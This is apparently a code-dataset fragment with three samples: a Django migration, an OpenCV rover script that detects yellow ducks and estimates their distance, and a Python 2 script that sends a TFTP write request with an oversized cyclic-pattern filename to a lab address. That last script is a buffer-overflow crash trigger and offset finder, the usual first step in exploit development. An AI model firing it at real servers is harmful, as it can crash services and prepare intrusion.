"step-5": "# Generated by Django 3.0.1 on 2020-02-01 16:38\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('shopUser', '0024_order_contact'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='order',\n name='location',\n field=models.CharField(default='dhaka,Mohammadpur', max_length=200),\n preserve_default=False,\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import requests,cv2,numpy,time,imutils
class imageAnalyzer():
def __init__(self,
roverName="Rover03",
url="http://192.168.1.10:5000/api/",
temp_img_path = "./temp",
):
self.url = url + roverName
self.temp_img_path = temp_img_path
def getImage(self,img_number): # gets image from camera and saves it as temp(img_number).jpeg
temp = open(self.temp_img_path + str(img_number) + ".jpeg", "wb")
img = requests.get(self.url + "/image")
temp.write(img.content)
temp.close()
def analyzeHSV(self,img_number,thresholds=(numpy.array([20,100,110]),numpy.array([40,255,255]))): # min, max, creates mask from HSV thresholds
img = cv2.imread(self.temp_img_path + str(img_number) + ".jpeg")
orig = numpy.copy(img)
try:
img = cv2.GaussianBlur(img,(7,7),8)
except:
pass
hsv = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)
ret = cv2.inRange(hsv, thresholds[0],thresholds[1])
return ret,orig
def findBoundingBoxes(self,img,orig=None,area_thresh=100,aspect_thresh=[0.8,1.0],y_threshold=[0,0.6]): # finds contours from mask and determines bound boxes, vetoes by minimum box area, aspect ratio and vertical screen portion
con = cv2.findContours(img,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
con = imutils.grab_contours(con)
if orig.any():
cv2.drawContours(orig, con, -1, (255, 255, 255),thickness=2)
bound = []
for c in con:
bound.append(cv2.boundingRect(c))
bound = list(filter(lambda x: (x[2]*x[3] >= area_thresh) and (aspect_thresh[0] <= x[3]/x[2] <= aspect_thresh[1]) and 480*y_threshold[0] <= 480-x[1] <= 480*y_threshold[1], bound)) # vetoing based on minimal bounding box area, relative position in image and aspect ratio
for b in bound:
cv2.rectangle(orig,b,color=(0,0,255),thickness=2)
cv2.imwrite("vis{}.jpg".format(0),orig)
return bound
def approx_distance(self,duckie_boxes,dist_half_screen=5,camera_y_res=480): # bounding boxes of ducks, calibration: distance in cm from camera to center of duck for duck to take up half of camera image height assuming duck size = const.
distances = {}
print(duckie_boxes)
for box in duckie_boxes:
distances[box] = round(dist_half_screen*(1/2)*(camera_y_res/box[3]))
distances = [ (box, round(dist_half_screen*(1/2)*(camera_y_res/box[3]) ) ) for box in duckie_boxes] # NOTE: Y coordinate origin is from the top of the image, returns list of (rect=(x_anchor,y_anchor,x_size,y_size),distance) tuple-value pairs (note,y_size goes downwards!)
return distances
def capture(self,temp_image=0,db_file="temp_duck_boxes.txt"): # gets image, returns bounding boxes and distances according to NOTE, creates temp images temp(n) and vis(n) with n = temp_image argument as well as distance text file
self.getImage(temp_image)
ret = self.analyzeHSV(temp_image)
boxes = self.findBoundingBoxes(ret[0], ret[1])
duck_box_file = open(db_file, "w")
dist = analyzer.approx_distance(boxes)
duck_box_file.write(str(dist))
duck_box_file.close()
return boxes, dist
analyzer = imageAnalyzer()
while True:
boxes, dist = analyzer.capture()
time.sleep(0.5)
|
normal
|
{
"blob_id": "7d3264e9a90ebd72439f77983cbf4f9755048a85",
"index": 4300,
"step-1": "<mask token>\n\n\nclass imageAnalyzer:\n <mask token>\n\n def getImage(self, img_number):\n temp = open(self.temp_img_path + str(img_number) + '.jpeg', 'wb')\n img = requests.get(self.url + '/image')\n temp.write(img.content)\n temp.close()\n\n def analyzeHSV(self, img_number, thresholds=(numpy.array([20, 100, 110]\n ), numpy.array([40, 255, 255]))):\n img = cv2.imread(self.temp_img_path + str(img_number) + '.jpeg')\n orig = numpy.copy(img)\n try:\n img = cv2.GaussianBlur(img, (7, 7), 8)\n except:\n pass\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n ret = cv2.inRange(hsv, thresholds[0], thresholds[1])\n return ret, orig\n\n def findBoundingBoxes(self, img, orig=None, area_thresh=100,\n aspect_thresh=[0.8, 1.0], y_threshold=[0, 0.6]):\n con = cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n con = imutils.grab_contours(con)\n if orig.any():\n cv2.drawContours(orig, con, -1, (255, 255, 255), thickness=2)\n bound = []\n for c in con:\n bound.append(cv2.boundingRect(c))\n bound = list(filter(lambda x: x[2] * x[3] >= area_thresh and \n aspect_thresh[0] <= x[3] / x[2] <= aspect_thresh[1] and 480 *\n y_threshold[0] <= 480 - x[1] <= 480 * y_threshold[1], bound))\n for b in bound:\n cv2.rectangle(orig, b, color=(0, 0, 255), thickness=2)\n cv2.imwrite('vis{}.jpg'.format(0), orig)\n return bound\n\n def approx_distance(self, duckie_boxes, dist_half_screen=5,\n camera_y_res=480):\n distances = {}\n print(duckie_boxes)\n for box in duckie_boxes:\n distances[box] = round(dist_half_screen * (1 / 2) * (\n camera_y_res / box[3]))\n distances = [(box, round(dist_half_screen * (1 / 2) * (camera_y_res /\n box[3]))) for box in duckie_boxes]\n return distances\n\n def capture(self, temp_image=0, db_file='temp_duck_boxes.txt'):\n self.getImage(temp_image)\n ret = self.analyzeHSV(temp_image)\n boxes = self.findBoundingBoxes(ret[0], ret[1])\n duck_box_file = open(db_file, 'w')\n dist = analyzer.approx_distance(boxes)\n duck_box_file.write(str(dist))\n duck_box_file.close()\n return boxes, dist\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass imageAnalyzer:\n\n def __init__(self, roverName='Rover03', url=\n 'http://192.168.1.10:5000/api/', temp_img_path='./temp'):\n self.url = url + roverName\n self.temp_img_path = temp_img_path\n\n def getImage(self, img_number):\n temp = open(self.temp_img_path + str(img_number) + '.jpeg', 'wb')\n img = requests.get(self.url + '/image')\n temp.write(img.content)\n temp.close()\n\n def analyzeHSV(self, img_number, thresholds=(numpy.array([20, 100, 110]\n ), numpy.array([40, 255, 255]))):\n img = cv2.imread(self.temp_img_path + str(img_number) + '.jpeg')\n orig = numpy.copy(img)\n try:\n img = cv2.GaussianBlur(img, (7, 7), 8)\n except:\n pass\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n ret = cv2.inRange(hsv, thresholds[0], thresholds[1])\n return ret, orig\n\n def findBoundingBoxes(self, img, orig=None, area_thresh=100,\n aspect_thresh=[0.8, 1.0], y_threshold=[0, 0.6]):\n con = cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n con = imutils.grab_contours(con)\n if orig.any():\n cv2.drawContours(orig, con, -1, (255, 255, 255), thickness=2)\n bound = []\n for c in con:\n bound.append(cv2.boundingRect(c))\n bound = list(filter(lambda x: x[2] * x[3] >= area_thresh and \n aspect_thresh[0] <= x[3] / x[2] <= aspect_thresh[1] and 480 *\n y_threshold[0] <= 480 - x[1] <= 480 * y_threshold[1], bound))\n for b in bound:\n cv2.rectangle(orig, b, color=(0, 0, 255), thickness=2)\n cv2.imwrite('vis{}.jpg'.format(0), orig)\n return bound\n\n def approx_distance(self, duckie_boxes, dist_half_screen=5,\n camera_y_res=480):\n distances = {}\n print(duckie_boxes)\n for box in duckie_boxes:\n distances[box] = round(dist_half_screen * (1 / 2) * (\n camera_y_res / box[3]))\n distances = [(box, round(dist_half_screen * (1 / 2) * (camera_y_res /\n box[3]))) for box in duckie_boxes]\n return distances\n\n def capture(self, temp_image=0, db_file='temp_duck_boxes.txt'):\n self.getImage(temp_image)\n ret = self.analyzeHSV(temp_image)\n boxes = self.findBoundingBoxes(ret[0], ret[1])\n duck_box_file = open(db_file, 'w')\n dist = analyzer.approx_distance(boxes)\n duck_box_file.write(str(dist))\n duck_box_file.close()\n return boxes, dist\n\n\n<mask token>\nwhile True:\n boxes, dist = analyzer.capture()\n time.sleep(0.5)\n",
"step-3": "<mask token>\n\n\nclass imageAnalyzer:\n\n def __init__(self, roverName='Rover03', url=\n 'http://192.168.1.10:5000/api/', temp_img_path='./temp'):\n self.url = url + roverName\n self.temp_img_path = temp_img_path\n\n def getImage(self, img_number):\n temp = open(self.temp_img_path + str(img_number) + '.jpeg', 'wb')\n img = requests.get(self.url + '/image')\n temp.write(img.content)\n temp.close()\n\n def analyzeHSV(self, img_number, thresholds=(numpy.array([20, 100, 110]\n ), numpy.array([40, 255, 255]))):\n img = cv2.imread(self.temp_img_path + str(img_number) + '.jpeg')\n orig = numpy.copy(img)\n try:\n img = cv2.GaussianBlur(img, (7, 7), 8)\n except:\n pass\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n ret = cv2.inRange(hsv, thresholds[0], thresholds[1])\n return ret, orig\n\n def findBoundingBoxes(self, img, orig=None, area_thresh=100,\n aspect_thresh=[0.8, 1.0], y_threshold=[0, 0.6]):\n con = cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n con = imutils.grab_contours(con)\n if orig.any():\n cv2.drawContours(orig, con, -1, (255, 255, 255), thickness=2)\n bound = []\n for c in con:\n bound.append(cv2.boundingRect(c))\n bound = list(filter(lambda x: x[2] * x[3] >= area_thresh and \n aspect_thresh[0] <= x[3] / x[2] <= aspect_thresh[1] and 480 *\n y_threshold[0] <= 480 - x[1] <= 480 * y_threshold[1], bound))\n for b in bound:\n cv2.rectangle(orig, b, color=(0, 0, 255), thickness=2)\n cv2.imwrite('vis{}.jpg'.format(0), orig)\n return bound\n\n def approx_distance(self, duckie_boxes, dist_half_screen=5,\n camera_y_res=480):\n distances = {}\n print(duckie_boxes)\n for box in duckie_boxes:\n distances[box] = round(dist_half_screen * (1 / 2) * (\n camera_y_res / box[3]))\n distances = [(box, round(dist_half_screen * (1 / 2) * (camera_y_res /\n box[3]))) for box in duckie_boxes]\n return distances\n\n def capture(self, temp_image=0, db_file='temp_duck_boxes.txt'):\n self.getImage(temp_image)\n ret = self.analyzeHSV(temp_image)\n boxes = self.findBoundingBoxes(ret[0], ret[1])\n duck_box_file = open(db_file, 'w')\n dist = analyzer.approx_distance(boxes)\n duck_box_file.write(str(dist))\n duck_box_file.close()\n return boxes, dist\n\n\nanalyzer = imageAnalyzer()\nwhile True:\n boxes, dist = analyzer.capture()\n time.sleep(0.5)\n",
"step-4": "import requests, cv2, numpy, time, imutils\n\n\nclass imageAnalyzer:\n\n def __init__(self, roverName='Rover03', url=\n 'http://192.168.1.10:5000/api/', temp_img_path='./temp'):\n self.url = url + roverName\n self.temp_img_path = temp_img_path\n\n def getImage(self, img_number):\n temp = open(self.temp_img_path + str(img_number) + '.jpeg', 'wb')\n img = requests.get(self.url + '/image')\n temp.write(img.content)\n temp.close()\n\n def analyzeHSV(self, img_number, thresholds=(numpy.array([20, 100, 110]\n ), numpy.array([40, 255, 255]))):\n img = cv2.imread(self.temp_img_path + str(img_number) + '.jpeg')\n orig = numpy.copy(img)\n try:\n img = cv2.GaussianBlur(img, (7, 7), 8)\n except:\n pass\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n ret = cv2.inRange(hsv, thresholds[0], thresholds[1])\n return ret, orig\n\n def findBoundingBoxes(self, img, orig=None, area_thresh=100,\n aspect_thresh=[0.8, 1.0], y_threshold=[0, 0.6]):\n con = cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n con = imutils.grab_contours(con)\n if orig.any():\n cv2.drawContours(orig, con, -1, (255, 255, 255), thickness=2)\n bound = []\n for c in con:\n bound.append(cv2.boundingRect(c))\n bound = list(filter(lambda x: x[2] * x[3] >= area_thresh and \n aspect_thresh[0] <= x[3] / x[2] <= aspect_thresh[1] and 480 *\n y_threshold[0] <= 480 - x[1] <= 480 * y_threshold[1], bound))\n for b in bound:\n cv2.rectangle(orig, b, color=(0, 0, 255), thickness=2)\n cv2.imwrite('vis{}.jpg'.format(0), orig)\n return bound\n\n def approx_distance(self, duckie_boxes, dist_half_screen=5,\n camera_y_res=480):\n distances = {}\n print(duckie_boxes)\n for box in duckie_boxes:\n distances[box] = round(dist_half_screen * (1 / 2) * (\n camera_y_res / box[3]))\n distances = [(box, round(dist_half_screen * (1 / 2) * (camera_y_res /\n box[3]))) for box in duckie_boxes]\n return distances\n\n def capture(self, temp_image=0, db_file='temp_duck_boxes.txt'):\n self.getImage(temp_image)\n ret = self.analyzeHSV(temp_image)\n boxes = self.findBoundingBoxes(ret[0], ret[1])\n duck_box_file = open(db_file, 'w')\n dist = analyzer.approx_distance(boxes)\n duck_box_file.write(str(dist))\n duck_box_file.close()\n return boxes, dist\n\n\nanalyzer = imageAnalyzer()\nwhile True:\n boxes, dist = analyzer.capture()\n time.sleep(0.5)\n",
"step-5": "import requests,cv2,numpy,time,imutils\r\n\r\nclass imageAnalyzer():\r\n\r\n def __init__(self,\r\n roverName=\"Rover03\",\r\n url=\"http://192.168.1.10:5000/api/\",\r\n temp_img_path = \"./temp\",\r\n ):\r\n\r\n self.url = url + roverName\r\n\r\n self.temp_img_path = temp_img_path\r\n\r\n def getImage(self,img_number): # gets image from camera and saves it as temp(img_number).jpeg\r\n\r\n temp = open(self.temp_img_path + str(img_number) + \".jpeg\", \"wb\")\r\n\r\n img = requests.get(self.url + \"/image\")\r\n\r\n temp.write(img.content)\r\n\r\n temp.close()\r\n\r\n def analyzeHSV(self,img_number,thresholds=(numpy.array([20,100,110]),numpy.array([40,255,255]))): # min, max, creates mask from HSV thresholds\r\n\r\n img = cv2.imread(self.temp_img_path + str(img_number) + \".jpeg\")\r\n\r\n orig = numpy.copy(img)\r\n\r\n try:\r\n\r\n img = cv2.GaussianBlur(img,(7,7),8)\r\n\r\n except:\r\n\r\n pass\r\n\r\n hsv = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\r\n\r\n ret = cv2.inRange(hsv, thresholds[0],thresholds[1])\r\n\r\n return ret,orig\r\n\r\n def findBoundingBoxes(self,img,orig=None,area_thresh=100,aspect_thresh=[0.8,1.0],y_threshold=[0,0.6]): # finds contours from mask and determines bound boxes, vetoes by minimum box area, aspect ratio and vertical screen portion\r\n\r\n con = cv2.findContours(img,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n con = imutils.grab_contours(con)\r\n\r\n if orig.any():\r\n\r\n cv2.drawContours(orig, con, -1, (255, 255, 255),thickness=2)\r\n\r\n bound = []\r\n\r\n for c in con:\r\n\r\n bound.append(cv2.boundingRect(c))\r\n\r\n bound = list(filter(lambda x: (x[2]*x[3] >= area_thresh) and (aspect_thresh[0] <= x[3]/x[2] <= aspect_thresh[1]) and 480*y_threshold[0] <= 480-x[1] <= 480*y_threshold[1], bound)) # vetoing based on minimal bounding box area, relative position in image and aspect ratio\r\n\r\n for b in bound:\r\n\r\n cv2.rectangle(orig,b,color=(0,0,255),thickness=2)\r\n\r\n cv2.imwrite(\"vis{}.jpg\".format(0),orig)\r\n\r\n return bound\r\n\r\n def approx_distance(self,duckie_boxes,dist_half_screen=5,camera_y_res=480): # bounding boxes of ducks, calibration: distance in cm from camera to center of duck for duck to take up half of camera image height assuming duck size = const.\r\n\r\n distances = {}\r\n\r\n print(duckie_boxes)\r\n\r\n for box in duckie_boxes:\r\n\r\n distances[box] = round(dist_half_screen*(1/2)*(camera_y_res/box[3]))\r\n\r\n distances = [ (box, round(dist_half_screen*(1/2)*(camera_y_res/box[3]) ) ) for box in duckie_boxes] # NOTE: Y coordinate origin is from the top of the image, returns list of (rect=(x_anchor,y_anchor,x_size,y_size),distance) tuple-value pairs (note,y_size goes downwards!)\r\n\r\n return distances\r\n\r\n def capture(self,temp_image=0,db_file=\"temp_duck_boxes.txt\"): # gets image, returns bounding boxes and distances according to NOTE, creates temp images temp(n) and vis(n) with n = temp_image argument as well as distance text file\r\n\r\n self.getImage(temp_image)\r\n\r\n ret = self.analyzeHSV(temp_image)\r\n\r\n boxes = self.findBoundingBoxes(ret[0], ret[1])\r\n\r\n duck_box_file = open(db_file, \"w\")\r\n\r\n dist = analyzer.approx_distance(boxes)\r\n\r\n duck_box_file.write(str(dist))\r\n\r\n duck_box_file.close()\r\n\r\n return boxes, dist\r\n\r\n\r\nanalyzer = imageAnalyzer()\r\n\r\nwhile True:\r\n\r\n boxes, dist = analyzer.capture()\r\n\r\n time.sleep(0.5)\r\n\r\n\r\n\r\n",
"step-ids": [
6,
8,
9,
10,
11
]
}
|
[
6,
8,
9,
10,
11
] |
#!/usr/bin/python
import socket
import sys
host = '10.211.55.5'
port = 69
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
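# the oversized filename below is a cyclic Metasploit-style pattern (Aa0Aa1Aa2...),
# presumably used to overflow the TFTP server's filename buffer and locate the crash offset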
filename = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0
Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk"
mode = "netascii"
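# "\x00\x02" is the TFTP WRQ (write request) opcode; the packet layout is opcode + filename + NUL + mode + NUL.
# The oversized cyclic-pattern filename above is used to stress/overflow the server's filename handling.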
buf = "\x00\x02" + filename + "\0" + mode + "\0"
s.sendto(buf, (host, port))
|
normal
|
{
"blob_id": "b318f5d443dbf8e4442707839649149e75653295",
"index": 5917,
